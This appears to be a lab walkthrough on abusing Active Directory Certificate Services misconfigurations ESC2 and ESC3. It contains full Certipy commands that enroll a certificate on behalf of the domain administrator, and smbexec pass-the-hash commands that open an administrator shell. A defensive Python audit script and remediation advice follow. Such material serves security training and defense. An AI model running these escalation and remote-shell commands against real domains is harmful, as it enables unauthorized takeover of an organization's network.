# ADCS - ESC2 & ESC3

* In order to abuse this misconfiguration, the following conditions must be met:
  1. **The Enterprise CA grants low-privileged users enrollment rights.** Details are the same as in ESC1.
  2. **Manager approval is disabled.** Details are the same as in ESC1.
  3. **No authorized signatures are required.** Details are the same as in ESC1.
  4. **An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.** Details are the same as in ESC1.
  5. **The certificate template defines Any Purpose EKUs or no EKU**.

### Request a certificate

```
sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC2 -ca MARYLAND-CA
```


* Request a certificate on behalf of another principal, using the certificate obtained above as the Certificate Request Agent certificate (`-pfx`)

```
sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template User -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.pereida.pfx
```


* Authenticate with the resulting certificate

```
sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12
```


### Get Shell or POWERSHELL :)

```
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local'
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local' -shell-type powershell
```

* We can also do the same with the ESC3-CRA and ESC3 templates in the lab:

## Enrollment Agent Templates — ESC3

In order to abuse this misconfiguration, the following conditions must be met:

1. **The Enterprise CA grants low-privileged users enrollment rights.** Details are the same as in ESC1.
2. **Manager approval is disabled.** Details are the same as in ESC1.
3. **No authorized signatures are required.** Details are the same as in ESC1.
4. **An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.** Details are the same as in ESC1.
5. **The certificate template defines the Certificate Request Agent EKU**. The Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) allows for requesting other certificate templates on behalf of other principals.
6. **Enrollment agent restrictions are not implemented on the CA.**

```
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3-CRA -ca MARYLAND-CA
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3 -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.Pereida.pfx
certipy auth -pfx administrator.pfx -username administrator -domain maryland.local -dc-ip 192.168.56.12
```
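As an added defender-side example (not code from this page or from Certipy), the following audit applies the ESC2 and ESC3 template conditions listed above to certificate template attributes. The input dicts are constructed to resemble the lab's ESC2, ESC3-CRA and User templates; the Any Purpose OID (2.5.29.37.0), the `CT_FLAG_PEND_ALL_REQUESTS` bit and the set of "low-privileged" principals are assumptions, and condition 6 (CA-level enrollment agent restrictions) is not modelled.

```python
# Added example, not from the page or Certipy: audit pKICertificateTemplate
# attributes for the ESC2 / ESC3 conditions. Each template is a constructed
# dict whose fields stand in for the AD attributes a real collector would read.

ANY_PURPOSE_OID = "2.5.29.37.0"                    # Any Purpose EKU (assumed OID)
CERT_REQUEST_AGENT_OID = "1.3.6.1.4.1.311.20.2.1"  # Certificate Request Agent EKU (from the page)
CT_FLAG_PEND_ALL_REQUESTS = 0x2                    # msPKI-Enrollment-Flag: manager approval required
# Principals treated as low-privileged for this demo (assumption; a real audit
# resolves the template security descriptor and the CA enrollment ACL).
LOW_PRIV = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}


def audit_template(tpl: dict) -> list[str]:
    """Return the ESC identifiers (ESC2 and/or ESC3) the template is exposed to."""
    low_priv_enroll = bool(LOW_PRIV & set(tpl["enrollment_principals"]))   # condition 1/4
    manager_approval = bool(tpl["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS)  # condition 2
    signatures_required = tpl["ra_signature"] > 0                          # condition 3
    if not low_priv_enroll or manager_approval or signatures_required:
        return []  # preconditions not met; template is not abusable as configured
    findings = []
    ekus = tpl["ekus"]
    if not ekus or ANY_PURPOSE_OID in ekus:        # ESC2: Any Purpose EKU or no EKU
        findings.append("ESC2")
    if CERT_REQUEST_AGENT_OID in ekus:             # ESC3: Certificate Request Agent EKU
        findings.append("ESC3")
    return findings


# Constructed sample templates modelled on the lab; the last one is a hardened variant.
SAMPLE_TEMPLATES = [
    {"name": "ESC2", "enrollment_principals": ["Domain Users"],
     "enrollment_flag": 0x0, "ra_signature": 0, "ekus": [ANY_PURPOSE_OID]},
    {"name": "ESC3-CRA", "enrollment_principals": ["Domain Users"],
     "enrollment_flag": 0x0, "ra_signature": 0, "ekus": [CERT_REQUEST_AGENT_OID]},
    {"name": "User", "enrollment_principals": ["Domain Users"],
     "enrollment_flag": 0x0, "ra_signature": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"]},   # Client Auth, Secure Email
    {"name": "SafeAgent", "enrollment_principals": ["Domain Admins"],
     "enrollment_flag": CT_FLAG_PEND_ALL_REQUESTS, "ra_signature": 1,
     "ekus": [CERT_REQUEST_AGENT_OID]},
]


def audit_all(templates: list[dict]) -> dict[str, list[str]]:
    """Map template name to its ESC findings."""
    return {t["name"]: audit_template(t) for t in templates}


if __name__ == "__main__":
    for name, escs in audit_all(SAMPLE_TEMPLATES).items():
        print(f"{name:10s} {', '.join(escs) or 'ok'}")
```

Templates reported as ESC2 or ESC3 are the ones to fix by removing the broad EKU, requiring manager approval or an authorized signature, or tightening enrollment permissions.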
